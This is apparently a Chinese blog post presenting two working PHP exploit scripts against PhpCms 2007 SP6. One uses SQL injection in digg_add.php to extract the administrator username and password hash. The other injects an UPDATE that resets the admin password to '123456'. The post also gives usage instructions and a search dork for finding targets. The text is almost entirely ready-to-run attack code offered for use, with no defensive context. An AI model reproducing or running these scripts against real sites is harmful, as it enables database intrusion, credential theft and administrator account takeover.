PhpCms2007 sp6 SQL injection 0day
2008年10月17日星期五 | | || <? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } function getrand($i) { for($j=0;$j<=$i-1;$j++) { srand((double)microtime()*1000000); $randname=rand(!$j ? 1: 0,9); $randnum.=$randname; } return $randnum; } function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} /*get $prefix*/ $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("in your SQL syntax",$html)) { $temp=explode("From ",$html); if(isset($temp[1])){$temp2=explode("product",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."\n"; } echo "[~]exploting now,plz waiting\r\n"; $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(181).chr(227).chr(187).chr(247),$html)) { echo $packet; echo $html; die("Exploit failed..."); } else { $pattern="/<a href=\"\/(.*?)\">/si"; preg_match($pattern,$html,$pg); $result=explode("|",$pg[1]); print_r(' -------------------------------------------------------------------------------- [+]username -> '.$result[0].' [+]password(md5 32λ) -> '.$result[1].' -------------------------------------------------------------------------------- '); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($result[1])) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?> 我在补上Ryat 贴出来可以update管理员密码的EXP #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 reset admin password exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 4) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user host: target server (ip/hostname) path: path to phpcms user: admin login name Example: php '.$argv[0].' localhost /phpcms/ admin +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $url = 'http://'.$host.$path.'member/member.php?username='.$user; send(); if (strpos(file_get_contents($url), 'puret_t') !== false) exit("Expoilt Success!\nAdmin New Password:\t123456\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path, $user; $cmd = 'digg_mod=admin,(Select/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 Where username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION Select 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6'; $message = "POST ".$path."digg/digg_add.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
博文
